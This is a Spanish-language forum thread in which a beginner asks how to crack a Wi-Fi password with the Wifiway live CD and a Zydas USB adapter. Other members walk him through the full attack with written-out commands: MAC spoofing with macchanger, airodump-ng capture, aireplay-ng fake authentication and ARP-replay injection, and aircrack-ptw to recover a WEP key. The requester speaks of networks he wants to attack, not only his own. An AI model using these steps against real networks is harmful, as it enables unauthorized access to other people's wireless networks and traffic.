Ayuda novato con Wifiway 6 y zydas

[alvarogemelo]

Bueno soy novatillo en esto y quisera instalar el wifiway y con la usb zydas poder sacar alguna contraseña pero sin animo de lucro por curiosidad porque a mi stas cosas de vulnerabilidad me gustan mucho pero no se como empezar,no hay algun minitutorial para realizarlo?
e visto post pero no tengo ni idea de cuales son los primeros pasos,si debo conecatr el wifiway con la usb metida,que comandos debo poner,que programas usar para la inyeccion y sacar la contraseña(aircrak,zydasinyected..),las librerias si hay que poner alguna,pero es que no se como hacer todo esto
bueno la instalacion no habia problema pero eso si una vez en el entrono windows de linux hay ya no se que hacer, me podeis decir los pasos a seguir ahora
Si tengo que bajarme algun programilla me lo podriais decir?
una vez dentro del wifiway le doy a interent y no me conecta,porque?si en windows si que funciona

Esto es lo que e podido recopilar de informacion :
Primero creo que debo poner esto en la consola de comando-->poner ifconfig eth1 down o iwconfig

Otro paso es Cambiar la mac:

ifconfig eth1 down
macchanger --mac=00:11:22:33:44:55 eth1
ifconfig eth1 up
iwconfig eth1 mode monitor channel el_que_sea rate 1M

Luego Poner el airodump:
airodump-ng eth1 -c el_que_sea --bssid MAC_AP -w nombre_fichero_capturas

Y para asociarme:
aireplay-ng -0 30 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1

Pero  si el nivel de señal no es relativamente bueno, no asocia.
Se Puede probar la opción -o que  A veces funciona mejor:

aireplay-ng -0 30 -o 1 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1


Alguien me puede orientar?
thanks

[hadrianweb]

Estas utilizando el atauqe 0 para asociarte y eso no es correcto

Para asociarte tienes que utilizar el ataque 1

Mira este post, te orientara mejor:

http://foro.seguridadwireless.net/index.php/topic,3693.0.html

[alvarogemelo]

no amigo no e hecho ningun ataque porque no se como se hace, lo que puse es cogido de este foro para orientarme pero no se si se hace asi o que,un paso a paso no me podeis decir y como usar el programa y tal?

[ChimoC]

Buenas alvarogemelo:

Si te das cuenta en el post que te dice hadrianweb, al final observarás que los comandos que estás poniendo están mal, ya que debes cambiar el 0 por un 1 (como bien te ha dicho el jefe )

Y si no sabes que es un A0 hasta un A5... lo que debes hacer es leer un poco más, y saber que es una desautentificación, asociación falsa, una inyección, un chop-chop... que está ya dicho por el foro.

Echa un vistazo aquí.... http://hwagm.elhacker.net/aircrack-ng.htm

Un saludo

ChimoC

[alvarogemelo]

bueno os comento,una vez dentro del wifiway 0.6 abro el terminal y pongo iwconfig y me dice esto

lo             no wireless extensions
eth           no wireless extensions
eth1         no wireless extensions
eth2         EEE 802.11b/g    ESSID: pf/any NIckname : "zd1211"  Encryption key :of
                Link Quality:0 Signel level:0 Noise level:0
                Rx invalid nwid:0   Rx invalid crypt:0   Rx invalid frag:0
                Tx excessive retries:0  Invalid misc:0  Missed beacon: 0


Pues hasta aqui me quede,no puedo ver mi disco duro aunque bueno no se como entrar veo el root pero no el disco D que es donde tengo escrito los comando que puese en el post en word y txx para probarlo
E abierto tambien el internet y no me funciona,sabeis el porque?

Por lo que me dices ChimoC tengo que bajarme el aircrack pero el de linux o windows?como lo instalo.hace años di algo de linux pero ya ni em acuerdo de los comandos ni nada a ver si consigo con vuestra ayuda desencriptar alguna red wifi

[the_often]

Bueno, a ver, es bueno leer manuales, no sé porqué la gente no lo hace.

Para ver tu disco duro tendras que montarlo con el comando mount, y asi ya podras ver su contenido.

Tambien se hace igual para leer/escribir en una memoria usb.


Como se usa el comando mount??  www.google.es, verás que facil lo encuentras, y te daras cuenta de lo mucho que se puede aprender y que solo es tener un poquito de tiempo y ganas de buscar y de LEER.


Un saludo!!

[hadrianweb]

wifiway 0.6 es un sistema unix eso para empezar, no tienes que descargarte nada porque ya lo trae todo.

Haz caso a chimoc porque tienes que leer y ver videos sobre seguridadwireless

una vez sepas los pasos que sigue una tarjeta el resto son iguales

P.D.Jaja, siempre se me adelanta la gente, estaba yo escribiendo el mensaje que se puede ver arriba y the_often se me adelanto

[the_often]

P.D.Jaja, siempre se me adelanta la gente, estaba yo escribiendo el mensaje que se puede ver arriba y the_often se me adelanto

      vale, vale, ya me piro a mi subforo.....

[hadrianweb]

noooooooooo, yo no quiero eso.

Todo lo contrario, es mejor asi.

[alvarogemelo]

por lo que lei igual me equivoco es usar linux con una usb wifi compatible para inyectar,se usa el aircrak y luego un programa hexadeciaml para convertir ese codigo a clave pero bueno mirare algun amnual de como se inyecta con otra tarjeta y si decis que es igual pues es ir probando y leer
gracias ya comentare dudas

[KeKo]

No hace falta convertirla. Se puede usar en hexadecimal, tanto en windows como con el wifiway.
De todas formas el aircrack-ng nuevo, cuando la encuentra, te muestra la clave de ambas formas (hexadecimal y ascii)

A mi lo que más me ayudó a empezar fueron los videos que hay en la web del wifislax, que te van poniendo todos los pasos y ver lo que hace cada uno ayuda mucho.
Me los vi todos y fuí tomando apuntes, y luego es cambiar un par de cosas (la interfaz y poco más) de lo que sale en los videos.

Por cierto, viene muy bien leer el manual del aircrack-ng en su web, que además está en castellano

El link: http://www.aircrack-ng.org/doku.php?id=spanish&DokuWiki=ac5e438f8e4328e4dfc81e02b059b929

[alvarogemelo]

E estado leyendo los post pero sigo sin aclararme y no tiene que ser tan dificil solo unos pasos pues esto es lo que creo de como se hace

Abrimos una consola
Código:
mousepad /sys/class/net/wifi0/device/channel-->ME ABRE UNA VENTANA EN BLANCO
Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutais vuestro sistema operativo y buscais redes wifi.-->ESTO NO SE LO QUE ES PORQUE NO SE COMO VEO SI HAY UNA RED A MI ALCANCE,QUE ES UNA AP Y COMO LO AVERIGUO?

Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos.
Cogemos el BSSID del AP (router)-->QUE ES EL BSSID Y DONDE LO AVERIGUO?
Código:
airodump-ng rtap0-->HACIENDO ESTO NO ME SALE NADA
Una vez aparezcan los BSSID pulsamos CTRL+C
Código:
mousepad /sys/class/net/wifi0/device/bssid

Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.
Código:
airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0
Abrimos otra consola
Código:
mousepad /sys/class/net/wifi0/device/rate
Lo ponemos a 2, guardamos y cerramos.
Código:
ifconfig wifi0 up

Código:
ifconfig

Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0

Tambien podeis poner
Código:
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0

de esta manera se asocia automaticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.

Una vez autentificados abrimos otra consola y ponemos
Código:
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0

Esperamos un rato como mucho 15 minutos y vereis como suben los ARP.

El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.


Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0

Y lo ejecutais de nuevo hasta que os autentifique o se os suban los ARP.

Sino autentifica fijaros que el RXQ (airodump-ng) esté por encima del 50%.

Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejeuctamos en otra consola.
Código:
aircrack-ptw FICHERO GUARDA IVS.cap

Al cabo de un rato os saldra KEY FOUND con la clave wep.

Me sigue sin funcionar el internet en wifiway y no se porque y mucho simbolos de mi teclado no corresponden con lo que escribo sobre todo en este simbolo - que en wifiway em sale este /

[KeKo]

Deberías ver los videos y leer el link que te he puesto. Te aclararan prácticamente todo lo que dudas.

E estado leyendo los post pero sigo sin aclararme y no tiene que ser tan dificil solo unos pasos pues esto es lo que creo de como se hace

Abrimos una consola
Código:
mousepad /sys/class/net/wifi0/device/channel-->ME ABRE UNA VENTANA EN BLANCO
Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutais vuestro sistema operativo y buscais redes wifi.-->ESTO NO SE LO QUE ES PORQUE NO SE COMO VEO SI HAY UNA RED A MI ALCANCE,QUE ES UNA AP Y COMO LO AVERIGUO?

Con "airodump-ng interfaz", sustituyendo interfaz por la tuya, que por lo que pones más arriba en otro post supongo que es eth2.

Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos.
Cogemos el BSSID del AP (router)-->QUE ES EL BSSID Y DONDE LO AVERIGUO?

Es la MAC del router y también te la dice el airodump-ng.

Código:
airodump-ng rtap0-->HACIENDO ESTO NO ME SALE NADA

Pues por que tu interfaz no es rtap0. Para saber tu interfaz usa "iwconfig". Si lo que pones en el post de arriba es correcto, tu interfaz es eth2.

Una vez aparezcan los BSSID pulsamos CTRL+C
Código:
mousepad /sys/class/net/wifi0/device/bssid

Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.
Código:
airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0
Abrimos otra consola
Código:
mousepad /sys/class/net/wifi0/device/rate
Lo ponemos a 2, guardamos y cerramos.
Código:
ifconfig wifi0 up

Código:
ifconfig

Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0

Tambien podeis poner
Código:
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0

de esta manera se asocia automaticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.

Una vez autentificados abrimos otra consola y ponemos
Código:
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0

Esperamos un rato como mucho 15 minutos y vereis como suben los ARP.

El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.


Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0

Y lo ejecutais de nuevo hasta que os autentifique o se os suban los ARP.

Sino autentifica fijaros que el RXQ (airodump-ng) esté por encima del 50%.

Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejeuctamos en otra consola.
Código:
aircrack-ptw FICHERO GUARDA IVS.cap

Al cabo de un rato os saldra KEY FOUND con la clave wep.

Me sigue sin funcionar el internet en wifiway y no se porque y mucho simbolos de mi teclado no corresponden con lo que escribo sobre todo en este simbolo - que en wifiway em sale este /

Hay un post sobre cómo configurar la conexión de internet desde wifiway. Búscalo.

Lo del símbolo es porque al arrancar el wifiway escoges mal el juego de símbolos. Cuando te de a elegir durante el arranque, escoje un que dice algo parecido a Spanish ISO no se qué más.

Para el resto de cosas (ataques y demás) mírate los videos y el manual del aircrack.

[alvarogemelo]

pues solo e encontrado esto para conectarme a internet
iwconfig interface essis "nombredelap" key "clave"
dhcpd interface

pero el nombredelap no se lo que es y key pues si navego con router.que hago?

[hadrianweb]

Como bien te hemos dicho, tienes mucho que leer, por que eso es basico

nombredelap = nombre de la red wifi

key = (bueno eso supongo que sabes lo que es)

[alvarogemelo]

pero si yo no tengo red wifi lo que quiero es cuando meto el cd wifiway poder mirar el foro y leer pero no me va el internet y sino tengo nombre de red ni clave como me ocnecto?

[hadrianweb]

jaja, si no titnes red pues no te conectas y punto.

Como te vas a conectar si no tienes internet?? (esos milagros aun no se inventaron)

Si tienes red wifi pero no sabes si nombre, pues es facil el airodump-ng te la dice.

Y si se te ha olvidado la clave de tu red wifi, o bien reseteas el router o bien utilizas el aircrack-ng para saberla

[alvarogemelo]

tengo internet a traves del modem de Ono a vetr si asi me decis como me conecto con el a internet
como hago para saber con wifiway si tengo una red cerca?
siento por ser tan inutil

[hadrianweb]

jaja simplemente pon en la terminal

airodump-ng interface

en donde interface es el nombre que corresponde a tu tarjeta de red wifi.

Con eso sabras las redes que tienes cerca.

tengo internet a traves del modem de Ono a vetr si asi me decis como me conecto con el a internet
como hago para saber con wifiway si tengo una red cerca?
siento por ser tan inutil

Una cosa, mirate los videos o lee manuales, ya que sin saber nada, no podemos explicarte paso por paso, seria un rompecabezas para nosotros.

Los videos lo dicen todo, puedes encontrarlos aqui

http://www.wifislax.com/soporte/videos.html

[alvarogemelo]

Bueno os comento hasta donde e llegado

abro una ventana de comando y pongo
iwconfig   y mi tarjeta es eth2

segundo paso
airodump-ng eth2    y aqui me aparecen estos datos

BBSID  PWR   BEACON   DATA   MB    CH    ENC     CHIPHER     AUTH      ESSID

aqui en estos datos en lo que importante es coger el canal de la red que quiera descifrar y que sea wep no?

Tambien salia esto

BSSID     STATION    PWR    LOST    PACKETS    PROBES


y ya realizo el siguiente paso que es

mousepad /sys/class/net/wifi0/device/channel --> aqui ya tengo el problema porque  el wifi0 que es?hay deberia poner el eth2?
en el channel debo de poner el que quiera descifrar no?
pues en este paso me quedo porque al ejecutar el comando me abre una ventana en blanco y le doy el siguiente comando que es   airodump-ng eth2  pero no hace nada ,que es lo que debo hacer?

[hadrianweb]

mira haz los mismo pasos que pusiste en el principio pero recuerda que es eth2 y cambiar el -0 por -1 en la asociacion. luego simplemente tienes que realizar el ataque tres

[alvarogemelo]

perdon hadrianweb que comando es para el ataque 3?
me puedes decir como hacer para tener internet desde mi modem en el wifiway?

bueno hice lo que me dijistes y estas mis dudas :

poner ifconfig eth1 down o iwconfig

Otro paso es Cambiar la mac:

ifconfig eth2 down ---> esto que funcion tiene?
macchanger --mac=00:11:22:33:44:55 eth2  --> que mac cojo la que quiero desencriptar o la que pone hay 0022:33:44:55?la mac es el BBSID?
ifconfig eth2 up -->que hace esto?
iwconfig eth1 mode monitor channel el_que_sea rate 1M

Luego Poner el airodump:
airodump-ng eth -c el_que_sea --bssid MAC_AP -w nombre_fichero_capturas  --> -c el que sea es el canal que quiero atacar no? el --bssid es el que quiero atacar y MAC AP es el nombre de la red que quiero atacar no?

Y para asociarme:
aireplay-ng -1 30 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth2 --> no se porque se pone 00:11:22:33:44:55

es que quiero saber que hago en cada paso

[uNbAs]

El comando del ataque 3 lo tienes en el manual de la suite aircrack-ng

Link ---> http://hwagm.elhacker.net/htm/aircrack-ng.htm

Para conectarte a internet te serviran los comandos basicos de red

Link ---> http://hwagm.elhacker.net/htm/comandoslinux.htm

[alvarogemelo]

Los primeros pasos son para:
Para lanzar la red: ifconfig eth2 up.
Para caer la red: ifconfig eth2 down
pero no entiendo porque se hace eso y cambiar la mac es decir no se que funcion tiene
el ataque 3 creo que es esto

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 eth2

que se puede tardar en desencriptar una clave con zydas?

[uNbAs]

Lo de cambiar la mac es como cambiarte el nombre en el dni o el numero del mismo ...

Tiempo estimado? ... lo q tarde en realizarse el ataque ... segundos ... minutos .... No hay un tiempo estimado ... Ya q esto depende de muchas cosas .... Tiempo/Hardware/Distacia ... Tres factores fundamentales 

[alvarogemelo]

pero el cambio de mac entonces no es imprescindible no?
para cambiar la mac mas rapido encontre este comando
 macchanger -m mac_nueva interface
decia del tiempo por si son 5,10,15minutos o mas es para saber la media de que se tarda

[hadrianweb]

el cambio de mac no es imprescindible, sin embargo si es recomendable.


La media, pues ahora mismo con el aircrack-ptw ponle como mucho de 15 a 20 minutos, claro que como dijo unbas pues puede cambiar muchisimo dependiendo de los tres factores que el marcó

[alvarogemelo]

vale pues entonces por que mac la cambio por la que em dijo el compañero o por alguna de las que me salgan de las redes que encuentre?
alguien em puede responder a los pasos que e  dado las respuestas alas preguntas que puse?
thanks

[uNbAs]

Q pasos quieres q se te aclare? ....

q no te puede aclarar el aircrack?

brevemente te lo digo ...

Pasos previos....

Ver si la interfaz esta levantada ... o activa, en caso de no estarlo ... levantala ...

Una ventana ... o shell como quieras llamarlo con airodump ... con la interfaz q uses

Otra ventana con aireplay ¿ataque? es q vallas a usar

En caso de usar un A1 + A3 usar dos ventanas de airodump ....

Creo q el ejemplo del carnet de identidad no te ha servido de mucho, pero weno ... para MI personalmente el cambio de MAC no es imprecindible ....

[alvarogemelo]

es decir tengo que tener varias shell abiertas a la vez,una con este comando
airodump-ng eth2 -c el_que_sea --bssid MAC_AP -w nombre_fichero_capturas

otra con el aireplay para el ataque 3 este comando
aireplay-ng -3 -b ESSID -a MAC_AP -h 00:11:22:33:44:55 eth2

y si ya quiero cambiar la mac
fconfig eth2 down
macchanger --mac=00:11:22:33:44:55 eth2
ifconfig eth2 up
iwconfig eth2 mode monitor channel el_que_sea rate 1M

con solo esto ya me daria la clave o tendria que hacer algo mas?

[ChimoC]

Hola alvarogemelo:

El A1 (asociación falsa) Esto es que no veas ninguna STATION asociada al BSSID cuando hayas lanzado el airodump

 aireplay-ng -1 10 -e patata -a 00:14:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX eth2

Donde:


      -1 significa falsa autenticación

      10 tiempo en segundos

      -e patata es el nombre de la red wireless
   
      -a 00:14:XX:XX:XX:XX es la dirección MAC del punto de acceso
   
      -h XX:XX:XX:XX:XX:XX es la dirección MAC de NUESTRA tarjeta
   
      eth2 es el nombre de la interface wireless (en este caso la tuya, por lo que he visto)

EL A3 (inyección)

 aireplay-ng -3 -b 00:14:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX eth2

 Donde:

   
      -3 significa reenvio estandard de petición arp (arp request)
   
      -b 00:14:XX:XX:XX:XX es la dirección MAC del punto de acceso
   
      -h XX:XX:XX:XX:XX:XX es la dirección MAC origen (de un cliente asociado [entonces no haría falta que hicieses el A1] o de una falsa autenticación [cuando has hecho el A1])
   
      eth2 es el nombre de TU interface wireless

Y si... abres 4 shells o ventanas... en una cambias la MAC de tu tarjeta (si quieres y si te apetece), en otra lanzas el airodump; en otras lanzas el A1 (siempre y cuando quieras hacer una asociación falsa.. si ves que hay un cliente asociado... pues como que no te haría falta) y en otra lanzas el A3. (el orden sería.... 1º cambio de MAC; 2º airodump; 3º y 4º en principio es indiferente)

Con eso NO obtendrías la clave WEP de TU AP.... con eso obtienes DATAS .. el siguiente paso es el aircrack (bien aircrack o bien aircrack-ptw) que lo has de pasar sobre el fichero capturas que te haya generado el airodump-ng...... ¿ok?..... entonces comprobarás la seguridad o inseguridad de TU AP

Un saludo

ChimoC

[alvarogemelo]

muy buena explicacio ahora cuanod vuelva a casa lo miro,que comando pongo para ver mi mac de mi tarjeta?
muchas gracias compi ya os comento si saco algo